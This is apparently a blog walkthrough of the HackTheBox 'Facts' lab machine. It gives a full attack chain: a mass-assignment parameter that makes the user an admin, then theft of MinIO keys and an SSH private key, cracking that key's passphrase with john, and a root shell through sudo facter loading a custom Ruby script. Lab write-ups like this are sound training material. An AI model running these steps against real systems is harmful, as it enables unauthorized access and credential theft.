HackTheBox: Facts

Getting MinIO credentials

Go to http://facts.htb/admin/profile/edit

xd

Hit change password and intercept the request, add this at the end of the request &password%5Brole%5D=admin

And this is what the request should look like

_method=patch&authenticity_token=nxxxxxxxxxxxxxxxxxxxxxppDf-G2Yxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx_yfHr5sdf6-adGzhw&password%5Bpassword%5D=xxxxxx&password%5Bpassword_confirmation%5D=xxxxasd&password%5Brole%5D=admin

Forward the request, go to the Admin UI then refresh, you should have full functions.

After that, go to Settings -> General Site -> File System settings, you should find the Secret Key and Access Key to MinIO, take note of that

Connect to MinIO and get the SSH key

Install the mc client if you haven’t done it: https://docs.min.io/enterprise/aistor-object-store/reference/cli/

After that, set alias to the server:

mc alias set facts http://facts.htb:54321 <ACCESS_KEY> <SECRET_KEY>

View the file if you want to:

mc ls facts/
[2025-xxx xxxx -03]     0B internal/
[2025-xxx xxxx -03]     0B randomfacts/

Now we pull the SSH key over from internal/.ssh/id_ed25519

mc get facts/internal/.ssh/id_ed25519

After getting the file, we bruteforce with john to find password:

ssh2john ./id_ed25519 > id.hash
john --wordlist=/usr/share/wordlist/rockyou.txt id.hash
john --show id.hash

And we got password as: dragonballz

Now we got to find which user to login

Now login to the server with the new credentials:

chmod 600 ./id_ed25519
ssh [email protected] -i ./id_ed25519

Get the flag

Now you should be logged in as trivia Checking sudo -l, we see the user can run facter

trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

First we create a script at /tmp/piv

mkdir /tmp/piv
echo 'exec "/bin/sh"' > /tmp/piv/a.rb

And we tell facter to use it

sudo /usr/bin/facter --custom-dir=/tmp/piv

After that steal all flags

cat /root/root.txt
cat /home/william/flag.txt

GG

twilight's home

pwn/web/dfir

2026-02-14